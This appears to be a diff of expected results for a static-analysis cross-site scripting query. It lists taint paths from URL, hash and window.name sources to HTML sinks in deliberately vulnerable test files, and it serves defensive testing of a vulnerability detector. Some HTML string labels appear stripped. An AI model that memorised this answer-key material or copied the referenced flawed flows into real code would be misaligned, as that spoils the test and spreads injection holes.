tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:136:18:136:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:136:18:136:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:151:49:151:49 | v | tst.js:148:29:148:50 | window. ... .search | tst.js:151:49:151:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:148:29:148:50 | window. ... .search | user-provided value | -| tst.js:155:29:155:46 | xssSourceService() | tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:158:40:158:61 | window. ... .search | user-provided value | -| tst.js:180:28:180:33 | target | tst.js:177:18:177:41 | documen ... .search | tst.js:180:28:180:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:177:18:177:41 | documen ... .search | user-provided value | -| tst.js:186:31:186:37 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:186:31:186:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:188:42:188:48 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:188:42:188:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:189:33:189:39 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:189:33:189:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:191:54:191:60 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:191:54:191:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:192:45:192:51 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:192:45:192:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:193:49:193:55 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:193:49:193:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:199:67:199:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:199:67:199:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:200:67:200:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:200:67:200:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:212:28:212:46 | this.state.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:212:28:212:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:213:28:213:46 | this.state.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:213:28:213:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:214:28:214:46 | this.state.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:214:28:214:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:218:32:218:49 | prevState.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:218:32:218:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:225:28:225:46 | this.props.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:225:28:225:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:226:28:226:46 | this.props.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:226:28:226:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:227:28:227:46 | this.props.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:227:28:227:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:231:32:231:49 | prevProps.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:231:32:231:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:251:60:251:82 | this.st ... Tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:251:60:251:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:259:7:259:17 | window.name | user-provided value | -| tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:260:7:260:10 | name | user-provided value | -| tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:264:11:264:21 | window.name | user-provided value | -| tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:280:22:280:29 | location | user-provided value | -| tst.js:288:59:288:65 | tainted | tst.js:285:19:285:29 | window.name | tst.js:288:59:288:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:285:19:285:29 | window.name | user-provided value | -| tst.js:303:20:303:20 | e | tst.js:301:9:301:16 | location | tst.js:303:20:303:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:301:9:301:16 | location | user-provided value | -| tst.js:311:20:311:20 | e | tst.js:308:10:308:17 | location | tst.js:311:20:311:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:308:10:308:17 | location | user-provided value | -| tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:316:35:316:42 | location | user-provided value | -| tst.js:332:18:332:35 | params.get('name') | tst.js:327:18:327:34 | document.location | tst.js:332:18:332:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:327:18:327:34 | document.location | user-provided value | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | tst.js:341:20:341:36 | document.location | tst.js:343:5:343:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:341:20:341:36 | document.location | user-provided value | -| tst.js:349:12:349:17 | target | tst.js:348:16:348:39 | documen ... .search | tst.js:349:12:349:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:348:16:348:39 | documen ... .search | user-provided value | -| tst.js:356:16:356:21 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:356:16:356:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:360:21:360:26 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:360:21:360:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:363:18:363:23 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:363:18:363:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:374:18:374:23 | target | tst.js:371:16:371:39 | documen ... .search | tst.js:374:18:374:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:371:16:371:39 | documen ... .search | user-provided value | -| tst.js:384:18:384:23 | target | tst.js:381:16:381:39 | documen ... .search | tst.js:384:18:384:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:386:18:386:29 | target.taint | tst.js:381:16:381:39 | documen ... .search | tst.js:386:18:386:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:392:18:392:30 | target.taint3 | tst.js:391:19:391:42 | documen ... .search | tst.js:392:18:392:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:391:19:391:42 | documen ... .search | user-provided value | -| tst.js:397:18:397:30 | target.taint5 | tst.js:381:16:381:39 | documen ... .search | tst.js:397:18:397:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:406:18:406:30 | target.taint7 | tst.js:381:16:381:39 | documen ... .search | tst.js:406:18:406:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:409:18:409:30 | target.taint8 | tst.js:381:16:381:39 | documen ... .search | tst.js:409:18:409:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:417:18:417:24 | payload | tst.js:416:17:416:36 | window.location.hash | tst.js:417:18:417:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:416:17:416:36 | window.location.hash | user-provided value | -| tst.js:421:20:421:27 | match[1] | tst.js:419:15:419:34 | window.location.hash | tst.js:421:20:421:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:34 | window.location.hash | user-provided value | -| tst.js:424:18:424:51 | window. ... '#')[1] | tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:424:18:424:37 | window.location.hash | user-provided value | -| tst.js:430:18:430:89 | target. ... data>') | tst.js:428:16:428:39 | documen ... .search | tst.js:430:18:430:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:428:16:428:39 | documen ... .search | user-provided value | -| tst.js:440:28:440:33 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:440:28:440:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:441:33:441:38 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:441:33:441:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:442:34:442:39 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:442:34:442:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:443:41:443:46 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:443:41:443:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:444:44:444:49 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:444:44:444:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:445:32:445:37 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:445:32:445:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:455:18:455:23 | source | tst.js:453:16:453:39 | documen ... .search | tst.js:455:18:455:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:456:18:456:42 | ansiToH ... source) | tst.js:453:16:453:39 | documen ... .search | tst.js:456:18:456:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:463:21:463:26 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:463:21:463:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:465:19:465:24 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:465:19:465:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:467:20:467:25 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:467:20:467:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:473:19:473:21 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:473:19:473:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:474:26:474:28 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:474:26:474:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:475:25:475:27 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:475:25:475:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:476:20:476:22 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:476:20:476:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:486:22:486:24 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:486:22:486:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:491:23:491:45 | locatio ... bstr(1) | tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:491:23:491:35 | location.hash | user-provided value | -| tst.js:494:18:494:40 | locatio ... bstr(1) | tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:494:18:494:30 | location.hash | user-provided value | -| tst.js:501:33:501:63 | decodeU ... n.hash) | tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:501:43:501:62 | window.location.hash | user-provided value | -| tst.js:509:18:509:54 | target. ... "), '') | tst.js:508:16:508:39 | documen ... .search | tst.js:509:18:509:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:508:16:508:39 | documen ... .search | user-provided value | -| typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:9:4:9:34 | "
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:9:4:9:34 | "
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:10:4:10:27 | `
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:10:4:10:27 | `
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:11:4:11:44 | "
    ") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:11:4:11:44 | "
    ") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '

    ' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | jwt.js:4:36:4:39 | data | semmle.label | data | | jwt.js:5:9:5:34 | decoded | semmle.label | decoded | | jwt.js:5:19:5:34 | jwt_decode(data) | semmle.label | jwt_decode(data) | @@ -252,8 +252,8 @@ nodes | pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | | pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | | pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | semmle.label | {\\n ... ,\\n } [id] | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | semmle.label | {\\n ... ,\\n } [q] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | semmle.label | {\\n ... e\\n } [id] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | semmle.label | {\\n ... e\\n } [q] | | pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | | pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | | pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | @@ -348,9 +348,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -373,240 +373,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | 